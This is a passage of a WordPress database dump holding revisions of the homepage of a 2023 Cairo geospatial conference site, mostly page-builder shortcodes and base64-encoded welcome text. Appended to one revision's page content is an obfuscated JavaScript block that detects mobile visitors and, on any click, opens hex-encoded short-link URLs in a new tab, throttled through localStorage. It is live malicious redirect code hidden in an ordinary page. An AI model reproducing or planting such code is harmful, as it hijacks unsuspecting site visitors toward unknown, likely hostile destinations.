link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQSUyMGp1c3RpZnklM0IlMjIlM0VBcyUyMHdlJTIwY2VsZWJyYXRlJTIwb3VyJTIwNTB0aCUyMGFubml2ZXJzYXJ5JTJDJTIwdGhlJTIwQXJhYiUyMEFjYWRlbXklMjBmb3IlMjBTY2llbmNlJTJDJTIwVGVjaG5vbG9neSUyQyUyMGFuZCUyME1hcml0aW1lJTIwVHJhbnNwb3J0JTIwJTI4QUFTVE1UJTI5JTIwaXMlMjBob25vcmVkJTIwdG8lMjBob3N0JTIwdGhlJTIwSVNQUlMlMjBmaXJzdCUyMEdlb3NwYXRpYWwlMjBXZWVrJTIwaW4lMjBBZnJpY2ElMjBhbmQlMjBNaWRkbGUlMjBFYXN0JTIwaW4lMjAyMDIzJTIwJTI4R1NXLTIwMjMlMjklMjB0aGF0JTIwd2lsbCUyMGJlJTIwaGVsZCUyMHVuZGVyJTIwdGhlJTIwYXVzcGljZXMlMjBvZiUyMEguRSUyMFNlY3JldGFyeS1HZW5lcmFsJTIwb2YlMjB0aGUlMjBMZWFndWUlMjBvZiUyMEFyYWIlMjBTdGF0ZXMuJTIwVGhlJTIwY29uZmVyZW5jZSUyMHdpbGwlMjBiZSUyMGhlbGQlMjBpbiUyMFNlcHRlbWJlciUyMDIwMjMlMkMlMjBhdCUyMHRoZSUyMEludGVyQ29udGluZW50YWwlMjBDYWlybyUyMENpdHklMjBzdGFycyUyMENhaXJvJTJDJTIwRWd5cHQuJTIwQUFTVE1UJTIwc3Ryb25nbHklMjBiZWxpZXZlcyUyMHRoYXQlMjBzY2llbmNlJTIwaXMlMjB0aGUlMjBrZXklMjB0byUyMHRoZSUyMGZ1dHVyZSUyMGFuZCUyMHRoZSUyMGNvcm5lcnN0b25lJTIwZm9yJTIwbmF0aW9ucyUyNyUyMHByb2dyZXNzJTIwYW5kJTIwcHJvc3Blcml0eS4lMjBJdCUyMGlzJTIwdGhlJTIwcHJpbWFyeSUyMGZhY3RvciUyMGZvciUyMGh1bWFuJTIwYWNoaWV2ZW1lbnRzJTIwdGhyb3VnaG91dCUyMGFsbCUyMGFnZXMuJTIwQUFTVE1UJTIwaGFzJTIwYSUyMGhvc3QlMjBvZiUyMHF1YWxpZmllZCUyMHByb2Zlc3NvcnMlMjBhbmQlMjBleHBlcnRzJTIwd2hvJTIwYXJlJTIwY2FwYWJsZSUyMG9mJTIwc3VwcG9ydGluZyUyMEFyYWIlMjBhbmQlMjBBZnJpY2FuJTIwY291bnRyaWVzJTIwaW4lMjB2YXJpb3VzJTIwc2NpZW50aWZpYyUyMGZpZWxkcy4lMjBUaGUlMjBHU1clMjB3aWxsJTIwcHJvdmlkZSUyMGElMjBwbGF0Zm9ybSUyMGZvciUyMGludGVybmF0aW9uYWwlMjBzY2hvbGFycyUyQyUyMGdyYWR1YXRlJTIwc3R1ZGVudHMlMkMlMjBmdXR1cmUlMjBzY2llbnRpc3RzJTIwYW5kJTIwaW5kdXN0cmlhbCUyMHNlY3RvcnMlMjB0byUyMGxlYXJuJTIwZXhjaGFuZ2UlMjBrbm93bGVkZ2UlMjBhbmQlMjBleHBlcmllbmNlcyUyMG9mJTIwYXBwbHlpbmclMjBnZW9zcGF0aWFsJTIwdGVjaG5vbG9naWVzJTIwZm9yJTIwc3VzdGFpbmFibGUlMjBkZXZlbG9wbWVudCUyMGZvciUyMGJldHRlciUyMHF1YWxpdHklMjBvZiUyMGxpZmUlMjBmb3IlMjBwZW9wbGUlMjBhcm91bmQlMjB0aGUlMjB3b3JsZC4lMjBXZSUyMHdvdWxkJTIwbGlrZSUyMHRvJTIwdGFrZSUyMHRoaXMlMjBvcHBvcnR1bml0eSUyMHRvJTIwd2VsY29tZSUyMHlvdSUyMHRvJTIwQ2Fpcm8lMjBhJTIwdmlicmFudCUyQyUyMGV4aGlsYXJhdGluZyUyQyUyMGV4b3RpYyUyQyUyMGZhc2NpbmF0aW5nJTIwYW5kJTIwd2VsY29taW5nJTIwY2l0eS4lMjBIb21lJTIwdG8lMjB0aGUlMjBiZXN0JTIwUGhhcmFvbmljJTJDJTIwQ29wdGljJTIwYW5kJTIwSXNsYW1pYyUyMHNpZ2h0cyUyMGluJTIwRWd5cHQuJTIwQ2Fpcm8lMjBpcyUyMHdoZXJlJTIweW91JTIwbmV2ZXIlMjBrbm93JTIwd2hhdCUyMGluY3JlZGlibGUlMkMlMjBoYWxmLWZvcmdvdHRlbiUyMG1vbnVtZW50JTIweW91JTIwbWlnaHQlMjBzdHVtYmxlJTIwYWNyb3NzJTIwd2hpbGUlMjB3YW5kZXJpbmclMjBhcm91bmQuJTIwRW5qb3klMjB0aGUlMjBOaWxlJTIwdmlldyUyQyUyMHZpc2l0JTIwdGhlJTIwZ3JlYXQlMjBweXJhbWlkcyUyMG9mJTIwR2l6YSUyQyUyMHdhbGslMjB0aHJvdWdoJTIwdGhlJTIwY2FwaXRhbCUyN3MlMjBtZWRpZXZhbCUyMG1hcmtldHMlMjBieSUyMEtoYW4lMjBFbC1LaGFsaWxpJTJDJTIwb3IlMjB3YWxrJTIwZG93biUyMHRoZSUyME5pbGUlMjBwcm9tZW5hZGUuJTIwV2UlMjBsb29rJTIwZm9yd2FyZCUyMHRvJTIwd29ya2luZyUyMHdpdGglMjB0aGUlMjBJU1BSUyUyMGNvdW5jaWwlMkMlMjBjb21taXNzaW9ucyUyMHByZXNpZGVudHMlMkMlMjB3b3JraW5nJTIwZ3JvdXAlMjBvZmZpY2VycyUyQyUyMGFuZCUyMG90aGVyJTIwc2lzdGVyJTIwb3JnYW5pemF0aW9ucyUyMHRvJTIwaGF2ZSUyMGElMjBzdWNjZXNzZnVsJTIwdGVjaG5pY2FsJTIwcHJvZ3JhbSUyMGFuZCUyMGElMjBtZW1vcmFibGUlMjBzb2NpYWwlMjBwcm9ncmFtLiUyMEl0JTIwaXMlMjBncmVhdCUyMHRvJTIwaGF2ZSUyMHRoZSUyMEdTVyUyMGNvbWluZyUyMHRvJTIwRWd5cHQlMjB3aGVyZSUyMG1vc3QlMjBwcm9iYWJseSUyMHRoZSUyMGZpcnN0JTIwbWFwcGluZyUyMHN5c3RlbXMlMjB3ZXJlJTIwZGV2ZWxvcGVkJTIwMTAwMHMlMjB5ZWFycyUyMGFnby4lMjBXZWxjb21lJTIwdG8lMjBHU1clMjcyMDIzJTIwaW4lMjBDYWlybyUyQyUyMEVneXB0LiUzQyUyRnAlM0U=[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-05 17:59:57','2022-10-05 17:59:57','',2167,'https://gsw2023.com/?p=2296',0,'revision','',0),
(2297,1,'2022-10-05 18:02:08','2022-10-05 18:02:08','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQSUyMGp1c3RpZnklM0IlMjIlMkMlMjJzdHlsZSUzRGNvbG9yJTIyYmxhY2slMjIlM0IlM0VBcyUyMHdlJTIwY2VsZWJyYXRlJTIwb3VyJTIwNTB0aCUyMGFubml2ZXJzYXJ5JTJDJTIwdGhlJTIwQXJhYiUyMEFjYWRlbXklMjBmb3IlMjBTY2llbmNlJTJDJTIwVGVjaG5vbG9neSUyQyUyMGFuZCUyME1hcml0aW1lJTIwVHJhbnNwb3J0JTIwJTI4QUFTVE1UJTI5JTIwaXMlMjBob25vcmVkJTIwdG8lMjBob3N0JTIwdGhlJTIwSVNQUlMlMjBmaXJzdCUyMEdlb3NwYXRpYWwlMjBXZWVrJTIwaW4lMjBBZnJpY2ElMjBhbmQlMjBNaWRkbGUlMjBFYXN0JTIwaW4lMjAyMDIzJTIwJTI4R1NXLTIwMjMlMjklMjB0aGF0JTIwd2lsbCUyMGJlJTIwaGVsZCUyMHVuZGVyJTIwdGhlJTIwYXVzcGljZXMlMjBvZiUyMEguRSUyMFNlY3JldGFyeS1HZW5lcmFsJTIwb2YlMjB0aGUlMjBMZWFndWUlMjBvZiUyMEFyYWIlMjBTdGF0ZXMuJTIwVGhlJTIwY29uZmVyZW5jZSUyMHdpbGwlMjBiZSUyMGhlbGQlMjBpbiUyMFNlcHRlbWJlciUyMDIwMjMlMkMlMjBhdCUyMHRoZSUyMEludGVyQ29udGluZW50YWwlMjBDYWlybyUyMENpdHklMjBzdGFycyUyMENhaXJvJTJDJTIwRWd5cHQuJTIwQUFTVE1UJTIwc3Ryb25nbHklMjBiZWxpZXZlcyUyMHRoYXQlMjBzY2llbmNlJTIwaXMlMjB0aGUlMjBrZXklMjB0byUyMHRoZSUyMGZ1dHVyZSUyMGFuZCUyMHRoZSUyMGNvcm5lcnN0b25lJTIwZm9yJTIwbmF0aW9ucyUyNyUyMHByb2dyZXNzJTIwYW5kJTIwcHJvc3Blcml0eS4lMjBJdCUyMGlzJTIwdGhlJTIwcHJpbWFyeSUyMGZhY3RvciUyMGZvciUyMGh1bWFuJTIwYWNoaWV2ZW1lbnRzJTIwdGhyb3VnaG91dCUyMGFsbCUyMGFnZXMuJTIwQUFTVE1UJTIwaGFzJTIwYSUyMGhvc3QlMjBvZiUyMHF1YWxpZmllZCUyMHByb2Zlc3NvcnMlMjBhbmQlMjBleHBlcnRzJTIwd2hvJTIwYXJlJTIwY2FwYWJsZSUyMG9mJTIwc3VwcG9ydGluZyUyMEFyYWIlMjBhbmQlMjBBZnJpY2FuJTIwY291bnRyaWVzJTIwaW4lMjB2YXJpb3VzJTIwc2NpZW50aWZpYyUyMGZpZWxkcy4lMjBUaGUlMjBHU1clMjB3aWxsJTIwcHJvdmlkZSUyMGElMjBwbGF0Zm9ybSUyMGZvciUyMGludGVybmF0aW9uYWwlMjBzY2hvbGFycyUyQyUyMGdyYWR1YXRlJTIwc3R1ZGVudHMlMkMlMjBmdXR1cmUlMjBzY2llbnRpc3RzJTIwYW5kJTIwaW5kdXN0cmlhbCUyMHNlY3RvcnMlMjB0byUyMGxlYXJuJTIwZXhjaGFuZ2UlMjBrbm93bGVkZ2UlMjBhbmQlMjBleHBlcmllbmNlcyUyMG9mJTIwYXBwbHlpbmclMjBnZW9zcGF0aWFsJTIwdGVjaG5vbG9naWVzJTIwZm9yJTIwc3VzdGFpbmFibGUlMjBkZXZlbG9wbWVudCUyMGZvciUyMGJldHRlciUyMHF1YWxpdHklMjBvZiUyMGxpZmUlMjBmb3IlMjBwZW9wbGUlMjBhcm91bmQlMjB0aGUlMjB3b3JsZC4lMjBXZSUyMHdvdWxkJTIwbGlrZSUyMHRvJTIwdGFrZSUyMHRoaXMlMjBvcHBvcnR1bml0eSUyMHRvJTIwd2VsY29tZSUyMHlvdSUyMHRvJTIwQ2Fpcm8lMjBhJTIwdmlicmFudCUyQyUyMGV4aGlsYXJhdGluZyUyQyUyMGV4b3RpYyUyQyUyMGZhc2NpbmF0aW5nJTIwYW5kJTIwd2VsY29taW5nJTIwY2l0eS4lMjBIb21lJTIwdG8lMjB0aGUlMjBiZXN0JTIwUGhhcmFvbmljJTJDJTIwQ29wdGljJTIwYW5kJTIwSXNsYW1pYyUyMHNpZ2h0cyUyMGluJTIwRWd5cHQuJTIwQ2Fpcm8lMjBpcyUyMHdoZXJlJTIweW91JTIwbmV2ZXIlMjBrbm93JTIwd2hhd